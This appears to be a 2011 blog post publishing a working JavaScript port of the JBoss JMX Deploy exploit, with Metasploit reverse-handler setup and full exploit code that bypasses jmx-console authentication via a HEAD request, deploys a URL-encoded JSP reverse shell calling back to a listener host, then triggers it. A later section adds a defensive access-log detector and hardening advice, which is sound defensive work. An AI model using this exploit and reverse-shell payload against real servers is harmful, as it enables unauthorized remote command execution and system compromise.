JBoss JMX Deploy Exploit
euronymous — 4 May, 2011 - 16:12
Just finished porting the JBoss JMX Deploy Exploit, originally coded in Ruby by l33tb0y, to Javascript.
It's working pretty nicely, and bypasses authentication via a HEAD request.
I've also added it to BeEF, take a look at it here: http://code.google.com/p/beef/source/detail?r=951
Before launching it, either this version or the BeEF one, remember to fire your Metasploit multi/handler:
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.2:6666
[*] Starting the payload handler...
Here is the plain Javascript version, using jQuery to issue XHRs:
<html>
<head>
<script src="./jquery-1.5.2.min.js" type="text/javascript"> </script>
</head>
<body>
<h1>Jboss 6.0.0M1 JMX Deploy Exploit</h1>
<br>author: Michele "antisnatchor" Orru'
<!--
 * Jboss 6.0.0M1 JMX Upload Exploit
 * Should also work on Jboss 5.1.0 and 4.x versions
 *
 * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
 * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler
 *
 * Please note that this is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell
-->
<div class="output"> </div>
<script type="text/javascript">
// Build a random alphanumeric string of the given length (used as the JSP file name)
function randomString(len, charSet) {
    charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    var result = '';
    for (var i = 0; i < len; i++) {
        var randomPoz = Math.floor(Math.random() * charSet.length);
        result += charSet.substring(randomPoz, randomPoz + 1);
    }
    return result;
}
// Target and Metasploit multi/handler listener settings
var rhost = "127.0.0.1"; // target host
var rport = "8080"; // target port
var lhost = "192.168.1.2"; // MSF handler listener host
var lport = "6666"; // MSF handler listener port
var command = "cmd.exe"; // command executed by Runtime.getRuntime().exec() inside the JSP
// URL-encoded JSP reverse shell; lhost, lport and command are spliced in below
var payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + command + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E";
var randomJspName = randomString(10);
var uri = "/jmx-console/HtmlAdaptor;index.jsp?" + "action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + randomJspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
$('.output').html("<br>[+] Sending HEAD request to Jboss<br>");
$.ajax({
    type: 'HEAD',
    url: 'http://' + rhost + ':' + rport + uri,
    dataType: 'script',
    success: function(data, textStatus, xhr) {
        $('.output').append("<br>[+] Now sleeping for 10 secs before activating the reverse payload <br>");
        function triggerReverseConn() {
            $('.output').append("<br>[+] Sending GET request to http://" + rhost + ":" + rport + "/web-console/" + randomJspName + ".jsp <br>");
            $.ajax({
                type: 'GET',
                url: 'http://' + rhost + ':' + rport + "/web-console/" + randomJspName + ".jsp",
                dataType: 'script',
                success: function(data, textStatus, xhr) {
                    $('.output').append("<br>[+] OK: Reverse JSP shell should have been triggered. Check your MSF handler listener. <br>");
                },
                error: function(jqXHR, textStatus, errorThrown) {
                    $('.output').append("<br>[+] ERROR: second GET request failed. <br>");
                }
            });
        }
        // sleep 10 secs before fetching the deployed JSP
        setTimeout(triggerReverseConn, 10000);
    },
    error: function(jqXHR, textStatus, errorThrown) {
        $('.output').append("<br>[+] ERROR: first HEAD request failed.");
    }
});
</script>
</body>
</html>
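On the defender's side, the two-step sequence the comments above describe (an invokeOp call on the DeploymentFileRepository MBean through the JMX console, followed by a fetch of the freshly written JSP under /web-console/) leaves a recognisable trace in the access log. The following is an added example, not code from the original post or from BeEF, that correlates those two requests per client over constructed sample log lines in Common Log Format; the client addresses, timestamps and file name in the sample are made up, and the access-log layout is assumed to be the default CLF pattern.

```javascript
// Added example (not from the original post): flag the JMX-console deploy
// pattern in JBoss/Tomcat-style access logs and correlate it with the
// follow-up fetch of the deployed JSP. All log lines below are constructed.
const SAMPLE_LOG = [
  '10.0.0.5 - - [04/May/2011:16:10:01 +0200] "GET /index.html HTTP/1.1" 200 1234',
  '10.0.0.9 - - [04/May/2011:16:10:07 +0200] "HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=kQ2xZ9pLmA&arg2=.jsp&arg3=%3C%25...%25%3E&arg4=True HTTP/1.1" 200 -',
  '10.0.0.9 - - [04/May/2011:16:10:18 +0200] "GET /web-console/kQ2xZ9pLmA.jsp HTTP/1.1" 200 0',
  '10.0.0.7 - - [04/May/2011:16:11:00 +0200] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 401 -'
];

// Common Log Format: client, identity, user, [timestamp], "METHOD path proto", status.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// A request is a DeploymentFileRepository store attempt when it reaches the
// HtmlAdaptor (prefix match, so the ";index.jsp" path-parameter form is caught
// too) with action=invokeOp on that MBean. arg1/arg2 carry the file name and
// extension that the follow-up request will fetch.
function deployRequest(req) {
  if (!req.path.startsWith('/jmx-console/HtmlAdaptor')) return null;
  const q = req.path.indexOf('?');
  if (q < 0) return null;
  const params = new URLSearchParams(req.path.slice(q + 1));
  if (params.get('action') !== 'invokeOp') return null;
  if (!/DeploymentFileRepository/i.test(params.get('name') || '')) return null;
  return { name: params.get('arg1'), ext: params.get('arg2') || '' };
}

// Walk the log once; emit a finding for every deploy attempt regardless of
// HTTP verb (the point of the HEAD variant is that the verb is not rejected),
// and a second finding when the same client later fetches the file it wrote.
function detectJmxDeploy(lines) {
  const pending = new Map(); // "client|file" -> deploy request
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const dep = deployRequest(req);
    if (dep) {
      const file = (dep.name || '') + dep.ext;
      findings.push({ kind: 'jmx-deploy', client: req.client, method: req.method, status: req.status, file: file, time: req.time });
      if (dep.name) pending.set(req.client + '|' + file, req);
      continue;
    }
    const m = /^\/web-console\/([^/?]+)$/.exec(req.path);
    if (m && pending.has(req.client + '|' + m[1])) {
      findings.push({ kind: 'deployed-jsp-triggered', client: req.client, status: req.status, file: m[1], time: req.time });
    }
  }
  return findings;
}

console.log(JSON.stringify(detectJmxDeploy(SAMPLE_LOG), null, 2));
```

Two points worth noting from the sample: the unauthenticated GET to the bare HtmlAdaptor (the 401 line) produces no finding, because a deploy needs the invokeOp query, while the HEAD request is flagged even though it carries no body and returns no content. The root cause the post relies on is that the jmx-console security constraint only covered specific verbs; the usual hardening is to drop the http-method restrictions from that constraint (so it applies to every verb) or to remove the jmx-console and web-console applications entirely where they are not needed.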

c00l
Anonymous — 5 May, 2011 - 16:16
c00l